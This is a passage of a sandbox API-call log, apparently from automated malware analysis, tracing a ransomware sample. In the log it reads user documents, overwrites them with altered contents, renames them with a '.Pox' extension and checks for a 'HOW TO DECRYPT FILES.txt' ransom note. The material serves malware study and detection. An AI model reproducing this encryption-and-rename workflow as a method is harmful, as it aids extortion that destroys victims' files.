cAlternateFileName="Y_F_NF~1.PPT")) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b8334a0, ftCreationTime.dwHighDateTime=0x1d51db5, ftLastAccessTime.dwLowDateTime=0x47771b40, ftLastAccessTime.dwHighDateTime=0x1d4b974, ftLastWriteTime.dwLowDateTime=0x47771b40, ftLastWriteTime.dwHighDateTime=0x1d4b974, nFileSizeHigh=0x0, nFileSizeLow=0x9032, dwReserved0=0x0, dwReserved1=0x0, cFileName="z0uuBt3LxozCdl4TPm0.docx", cAlternateFileName="Z0UUBT~1.DOC")) returned 1 [0038.699] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b8334a0, ftCreationTime.dwHighDateTime=0x1d51db5, ftLastAccessTime.dwLowDateTime=0x47771b40, ftLastAccessTime.dwHighDateTime=0x1d4b974, ftLastWriteTime.dwLowDateTime=0x47771b40, ftLastWriteTime.dwHighDateTime=0x1d4b974, nFileSizeHigh=0x0, nFileSizeLow=0x9032, dwReserved0=0x0, dwReserved1=0x0, cFileName="z0uuBt3LxozCdl4TPm0.docx", cAlternateFileName="Z0UUBT~1.DOC")) returned 0 [0038.699] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0038.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0038.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0038.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx", lpFilePart=0x0) returned 0x3e [0038.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1px_gb60 0be4d3dn.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.699] GetFileType (hFile=0x26c) returned 0x1 [0038.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.699] GetFileType (hFile=0x26c) returned 0x1 [0038.699] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x7cbb [0038.699] ReadFile (in: hFile=0x26c, lpBuffer=0x25ab738, nNumberOfBytesToRead=0x7cbb, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x25ab738*, lpNumberOfBytesRead=0x3ae570*=0x7cbb, lpOverlapped=0x0) returned 1 [0038.771] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.771] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.772] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx", lpFilePart=0x0) returned 0x3e [0038.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1px_gb60 0be4d3dn.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.773] GetFileType (hFile=0x26c) returned 0x1 [0038.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.773] GetFileType (hFile=0x26c) returned 0x1 [0038.773] WriteFile (in: hFile=0x26c, lpBuffer=0x24291c8*, nNumberOfBytesToWrite=0x7cc0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x24291c8*, lpNumberOfBytesWritten=0x3ae564*=0x7cc0, lpOverlapped=0x0) returned 1 [0038.774] CloseHandle (hObject=0x26c) returned 1 [0038.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx", lpFilePart=0x0) returned 0x3e [0038.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx.Pox", lpFilePart=0x0) returned 0x42 [0038.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.775] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1px_gb60 0be4d3dn.pptx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40238fb0, ftCreationTime.dwHighDateTime=0x1d50aad, ftLastAccessTime.dwLowDateTime=0x85834890, ftLastAccessTime.dwHighDateTime=0x1d4c758, ftLastWriteTime.dwLowDateTime=0x294bea20, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x7cc0)) returned 1 [0038.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.775] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1px_gb60 0be4d3dn.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1pX_gB60 0bE4d3dn.pptx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1px_gb60 0be4d3dn.pptx.pox")) returned 1 [0038.776] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx", lpFilePart=0x0) returned 0x3c [0038.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2vamuplz6i8mh4s.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.776] GetFileType (hFile=0x26c) returned 0x1 [0038.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.776] GetFileType (hFile=0x26c) returned 0x1 [0038.776] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x89f9 [0038.776] ReadFile (in: hFile=0x26c, lpBuffer=0x243143c, nNumberOfBytesToRead=0x89f9, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x243143c*, lpNumberOfBytesRead=0x3ae570*=0x89f9, lpOverlapped=0x0) returned 1 [0038.777] CloseHandle (hObject=0x26c) returned 1 [0038.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.794] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx", lpFilePart=0x0) returned 0x3c [0038.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2vamuplz6i8mh4s.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.795] GetFileType (hFile=0x26c) returned 0x1 [0038.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.795] GetFileType (hFile=0x26c) returned 0x1 [0038.795] WriteFile (in: hFile=0x26c, lpBuffer=0x24a9584*, nNumberOfBytesToWrite=0x8a00, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x24a9584*, lpNumberOfBytesWritten=0x3ae564*=0x8a00, lpOverlapped=0x0) returned 1 [0038.796] CloseHandle (hObject=0x26c) returned 1 [0038.797] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx", lpFilePart=0x0) returned 0x3c [0038.797] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx.Pox", lpFilePart=0x0) returned 0x40 [0038.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2vamuplz6i8mh4s.docx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66aa62b0, ftCreationTime.dwHighDateTime=0x1d4cb58, ftLastAccessTime.dwLowDateTime=0xd3615330, ftLastAccessTime.dwHighDateTime=0x1d4d3b1, ftLastWriteTime.dwLowDateTime=0x294e4b80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x8a00)) returned 1 [0038.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.797] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2vamuplz6i8mh4s.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2vaMuPlZ6I8mh4S.docx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2vamuplz6i8mh4s.docx.pox")) returned 1 [0038.798] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt", lpFilePart=0x0) returned 0x3c [0038.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5vv fmknuqagvr1v.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.798] GetFileType (hFile=0x26c) returned 0x1 [0038.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.798] GetFileType (hFile=0x26c) returned 0x1 [0038.798] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0xcdf5 [0038.798] ReadFile (in: hFile=0x26c, lpBuffer=0x24b2524, nNumberOfBytesToRead=0xcdf5, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x24b2524*, lpNumberOfBytesRead=0x3ae570*=0xcdf5, lpOverlapped=0x0) returned 1 [0038.799] CloseHandle (hObject=0x26c) returned 1 [0038.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt", lpFilePart=0x0) returned 0x3c [0038.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5vv fmknuqagvr1v.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.817] GetFileType (hFile=0x26c) returned 0x1 [0038.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.817] GetFileType (hFile=0x26c) returned 0x1 [0038.817] WriteFile (in: hFile=0x26c, lpBuffer=0x2525d24*, nNumberOfBytesToWrite=0xce00, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2525d24*, lpNumberOfBytesWritten=0x3ae564*=0xce00, lpOverlapped=0x0) returned 1 [0038.819] CloseHandle (hObject=0x26c) returned 1 [0038.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt", lpFilePart=0x0) returned 0x3c [0038.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt.Pox", lpFilePart=0x0) returned 0x40 [0038.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.820] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5vv fmknuqagvr1v.odt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b84e000, ftCreationTime.dwHighDateTime=0x1d4c946, ftLastAccessTime.dwLowDateTime=0x8d0bb710, ftLastAccessTime.dwHighDateTime=0x1d4ce14, ftLastWriteTime.dwLowDateTime=0x29530e40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xce00)) returned 1 [0038.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.820] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5vv fmknuqagvr1v.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Vv FMKnuQagvr1v.odt.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5vv fmknuqagvr1v.odt.pox")) returned 1 [0038.821] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx", lpFilePart=0x0) returned 0x35 [0038.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\at0fahyq.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.821] GetFileType (hFile=0x26c) returned 0x1 [0038.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.821] GetFileType (hFile=0x26c) returned 0x1 [0038.821] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x17328 [0038.821] ReadFile (in: hFile=0x26c, lpBuffer=0x34ff950, nNumberOfBytesToRead=0x17328, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x34ff950*, lpNumberOfBytesRead=0x3ae570*=0x17328, lpOverlapped=0x0) returned 1 [0038.822] CloseHandle (hObject=0x26c) returned 1 [0038.840] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0038.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0038.840] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0038.840] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx", lpFilePart=0x0) returned 0x35 [0038.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0038.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\at0fahyq.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.841] GetFileType (hFile=0x26c) returned 0x1 [0038.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0038.841] GetFileType (hFile=0x26c) returned 0x1 [0038.841] WriteFile (in: hFile=0x26c, lpBuffer=0x3573978*, nNumberOfBytesToWrite=0x17330, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x3573978*, lpNumberOfBytesWritten=0x3ae564*=0x17330, lpOverlapped=0x0) returned 1 [0038.843] CloseHandle (hObject=0x26c) returned 1 [0038.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx", lpFilePart=0x0) returned 0x35 [0038.846] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx.Pox", lpFilePart=0x0) returned 0x39 [0038.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0038.846] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\at0fahyq.pptx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361e0cb0, ftCreationTime.dwHighDateTime=0x1d53498, ftLastAccessTime.dwLowDateTime=0x564bee80, ftLastAccessTime.dwHighDateTime=0x1d53088, ftLastWriteTime.dwLowDateTime=0x29556fa0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x17330)) returned 1 [0038.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0038.846] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\at0fahyq.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\at0FaHyq.pptx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\at0fahyq.pptx.pox")) returned 1 [0038.847] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx", lpFilePart=0x0) returned 0x3f [0038.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0038.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c-OUqwNcpwZKsqZUKU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c-ouqwncpwzksqzuku.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0038.847] GetFileType (hFile=0x26c) returned 0x1 [0038.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0038.847] GetFileType (hFile=0x26c) returned 0x1 [0038.847] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0xd08f [0038.847] ReadFile (in: hFile=0x26c, lpBuffer=0x25803f0, nNumberOfBytesToRead=0xd08f, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x25803f0*, lpNumberOfBytesRead=0x3ae570*=0xd08f, lpOverlapped=0x0) returned 1 [0038.848] CloseHandle (hObject=0x26c) returned 1 [0038.906] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 